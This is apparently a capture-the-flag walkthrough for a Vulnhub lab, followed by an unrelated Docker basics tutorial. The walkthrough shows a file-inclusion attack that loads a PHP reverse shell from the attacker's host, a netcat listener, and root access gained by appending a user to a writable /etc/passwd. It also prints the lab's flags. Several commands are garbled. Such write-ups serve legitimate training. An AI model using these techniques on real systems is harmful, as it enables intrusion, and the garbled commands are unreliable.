HA: ISRO Vulnhub Walkthrough

Today we are going to solve our CTF challenge called “HA: Infinity Stones” We have developed this lab for the purpose of online penetration practices. Solving this lab is not that tough if have proper basic knowledge of Penetration testing. Let’s start and learn how to breach it.

Download Here

Level: Intermediate

Task: Find 4 Flags on the victim’s machine.

Penetration Methodologies

·         Scanning Network

o   Netdiscover

o   Nmap

·         Enumeration

o   Browsing HTTP Service

o   Performing Directory Bruteforce

·         Exploitation

o   LFI

o   Create PHP reverse shell

o   Reading /etc/passwd file

o   Getting a reverse connection

o   Spawning a TTY Shell

·         Privilege Escalation

o   Writable etc/passwd File

Walkthrough

Scanning Network

Firsts of all we try to identify our target and for this use the following command:

netdiscover

Now that we have identified our target using the above command, we can continue on to our second step that is scanning the target. We will use nmap to scan the target with the following command:

nmap -A 192.168.1.104

Enumeration

With the help of help scan, we now know that port number 22, 80 are open with the service of SSH, HTTP respectively. Now that port 80 is open we open the target IP address in our browser as shown in the following image:

http://192.168.1.104

It opened a webpage as shown in the above image. Here we found the bhaskara page, so now we opened and found an information webpage there as shown in the image below:

http://192.168.1.104/bhaskara.html

As convention we will enumerate the webpage by going through the source code. We see that we have the Bhaskara Launch Code. This seems a base64 encoded text.

Now we got to decode it. To do this we will be use the combination of the echo command and the base64 -d.

echo "L2JoYXNrYXJh" 1 base64 -d

After decoding the base64 encoded text we get "/bhaskara". This seems a hint that there might be a directory named bhaskara.

So, we went on to our browser in order to browse the bhaskara directory. We see that a file is downloaded when we browse the URL. This is a 2MB file. After enumerating the file, we came to realize that it is a TrueCrypt file.

Now in order to crack this file we are going to use extract its hash using the true.py. You can download the true.py from this link. We named the file as true.py and ran it and it gave us the password as xavier.

python true.py bhaskara > hashes

john hashes --show

Now as we knew it was a TrueCrypt file. That means it might be hiding something inside it. So, we tried to open it using VeraCrypt by providing it path and selecting a volume as shown in the given image.

Upon mounting the TrueCrypt file on a slot, we are asked to enter the password. We enter the password that we found earlier i.e. ‘xavier’  

It opened up to show a text file labelled ‘flag.txt’. We opened it; it gave us our first flag. Bhaskara Flag.

Bhaskara Flag: {b7bb88578a70970b9be45ac8630b6f9d}

Now let's move forward in Enumeration. We also performed a directory scan. This gave us an /img directory. We performed an extension directory scan. It gave us a connect.php.

dirb http://192.168.1.104

dirb http://192.168.1.104 -X .php

We went into the /img directory. Here we found an image called aryabhata.jpg.

We will download the aryabhata.jpg and opened it. 

 Upon opening it we found it to be the poster for Aryabhata satellite as shown in the image given below.

As we couldn't find anything specific with the image, we suspected that there is some steganography involved. Hence, we decided to use the Steghide tool to extract anything that might be hidden in the image. We saw that there is a text file named flag.txt hidden inside it. On opening it we found the Aryabhata flag. 

steghide extract -sf aryabhata.jpg

cat flag.txt

Aryabhata Flag:{e39cf1cbb00f09141259768b6d4c63fb}

Exploitation

Back to the Web Browser, we also found a connect.php in out drib directory bruteforce. This gave us nothing. Then we realized that this can be command injection. Now to test we tried opening the etc/passwd file through it. As seen in the image given below, we see that it’s a File Inclusion Vulnerability.

192.168.1.104/connect.php?file=/etc/passwd

We edited our shell.php, to enter the attacker machine IP address. And then closed the file after saving it. Now we need to send this to the target machine. Hence, we started a python http server using the one liner showed below.

nano shell.php

python -m SimpleHTTPServer

We are gonna capture a reverse connection using the netcat. So we need to initiate a listener on the port mentioned in the shell file.

nc -lvp 1234

After starting the listener on the target machine, we will run the shell on the target machine using the File Inclusion Vulnerability.

192.168.1.104/connect.php?file=http://192.168.1.103:8000/shell.php

Upon execution, the shell gave us a session the target machine. As seen in the image given below, it wasn’t a proper shell. So, we needed a python one liner to convert it into a proper shell.

python3 -c 'import pty;pty.spawn("/bin/bash")'

We used netstat command to check for the IP address and ports the target machine is listening on and found that a web service (3306) is allowed for localhost only. The most common service to run on the port 3306 is MySQL. Let’s enumerate in that direction.

netstat -antp

We tried to login in the MySQL database as root user. After logging in the MySQL, we enumerated the databases. Here we found a database named ‘flag’. We looked inside the tables of flag database. Here we found our second flag Mangalyaan Flag.

mysql -u root 

show databases;

use flag;

show tables;

select * from flag;

Mangalyaan Flag:{d8a7f803e36f1c84e277009bf2c0f435}

Privilege Escalation

As a part of our Enumeration for Escalating Privilege on the target machine, we try to find if the /etc/passwd is writable. We can see that the file is, in fact, writable. This is our way to move forward.

ls -la /etc/passwd

Now we going to need the password hash for the user that we are going to create on the target machine by making an entry in the /etc/passwd file. We are going to use the openssl to generate a salted hash.

openssl passwd -1 -salt user3 pass123 $1$user3$rAGRVf5p2jYTqtq0W5cPu/

Now back to our remote shell on the target machine. Here we are going to use the hash that we generated in the previous step and make a user raj which has the elevated privilege. We used the echo command to make an entry in the /etc/passwd file. After making an entry we checked the entry using the tail command. Now, all we got to do is run su command with the user name we just created and enter the password and we have the root shell. We traversed inside the root directory to find our final flag, Chandrayaan Flag.

echo 'raj:$1$user3$rAGRVf5p2jYTqtq0W5cPu/:0:0::/root:/bin/bash' >>/etc/passwd

tail /etc/passwd

su raj

Password: pass123

cd /root

ls

cat final.txt 

Chandrayaan Flag:{0ad8d59efe7ce5c820aa7350a5d708b2}

Docker Installation & Configuration

Docker services are extensively used in IT operations, so it is very important that you start learning from docker basics. In this article, we will cover the installation and setup of the docker, along with its specific uses.

Learn web application in

Table of Contents

·         Introduction to docker

·         Docker and its terminology

·         Advantages of docker

·         Installation and usage

Introduction to Docker

Docker is a third-party tool developed to create an isolated environment to execute any application. These applications are run using containers. These containers are unique because they bring together all the dependencies of an application into a single package and deploy it. 

Now, to work with docker you will need to install docker engine in your host. It is a foundation to the docker system, which basically runs as client-server application. Its daemon process is referred to as server and the command line interface is referred to as client and REST API is used to create communication link between client and server.

In Linux, docker client interacts with docker server through the CLI. Here, terminal is docker client and docker host will run the docker daemon.

Whereas in windows, to work with docker, we need to install docker toolbox component in docker host in order to set up environment on your Windows or iOS.

Docker and its terminology

When working with docker, one should be familiar with the following terms :

·         Docker Hub: It is a repository which available to all who uses docker through cloud. Through docker hub, one can create, store, test, pull and share container images.

·         Docker Images : Docker image acts as a template in order to create container. Build command is used to create docker images. Docker images makes it easy.

·         Docker containers : Containers are said to be isolated environment provided to the docker image and its dependencies so that it can run independently. The focus of deploying a container is to update or repair an application or just simply modify it and share it. When working on an image, container lets you create a layer of a single command used which make it easy to modify it, or upgrade or degrade is version.

·         Docker Registry : All the docker images are stored in docker registry. User can either can have local registry on their system or they can have a public one like docker hub.

Advantages of docker

·         Easy to use

·         Faster scaling systems

·         Better software delivery

·         Flexibility

·         Provides isolated environment

·         Supports software defined networking

·         Rapid deployment

·         Security

Installation and usage

To install docker, simply open the terminal of Linux and type the following command :

apt install docker.io

To check the version one can use the following command :

docker –version

Further you can run help command in docker, which is as following, to know all the options that dokcer provides at your service.

docker --help

Once the docker is up and running, you can run or pull any image in your docker container. For instance, here we have run hello-world. When you run the following command, it will first check your local repository; if the image is not available there then it will pull it from docker hub.

docker run hello-world

As we have explained before, CLI works as a client, so directly from the terminal you can search for any image you like. Like, here we have searched for ubuntu. One thing to remember here is that image with more stars will be the most authentic one.

docker search ubuntu

Once you find your image, you can pull it into your container with the following command :

docker pull ubuntu

Now to check how many images you have in your docker, simply type the following command :

docker images

To remove any image, use the following command :

docker rmi hello-world

Here, rmi refers to remove image.

Now, in the details given by ps command, you can see that the name of our ubuntu image is adoring curie, which is a random name generated by docker for every image. To, rename this name we can use following command :

docker run -it -d –name “ignite” ubuntu

And you can confirm with the ps command again that the name has been changed as shown in the image below :

The docker attach command permits you to attach to a running container using the container ID or name, you can use one instance of shell only though attach command. But if you crave to open new terminal with new instance of container's shell, we just need run docker exec.

docker attach ignite

docker exec -i -ignite /bin/bash

Using the ps command we can see all the processes that are running in docker. There, for this, type :

docker ps

docker ps -a

To stop the running container, you can use stop command as shown in the below image, we have stopped the container and its process which can be confirm with the help of process command. As result there should be no running process for ignite.

docker stop

If you can export the docker filesystem as a tar archive, use export command to compress the filesystem of a docker container into tar. The export commands fetch the whole container like a snapshot of a regular VM.

docker export | gzip > {path for tar} filename.tar

docker export | gzip > {path for tar} filename.tar

It will give you a flat .tar archive containing the filesystem of your container.

When you will export container as tar file, the file has hash value which can read as:

cat {path of exported tar file} |docker import – newignitelab 

In order to save the image of container which you can upload on other docker use save command.  You can subsequently load this "saved" images into a new docker instance and create containers from these images.

docker save | gzip > {path for tar} filename.tar

docker load -i /home/raj/docker/igniteimage.tar

In order to clear all image and or stop all process of the container. It will pack the layers and metadata of all the chain required to build the image.

docker rm -f $(docker ps -aq)

To learn how to setup vulnerable web application setup using docker from here.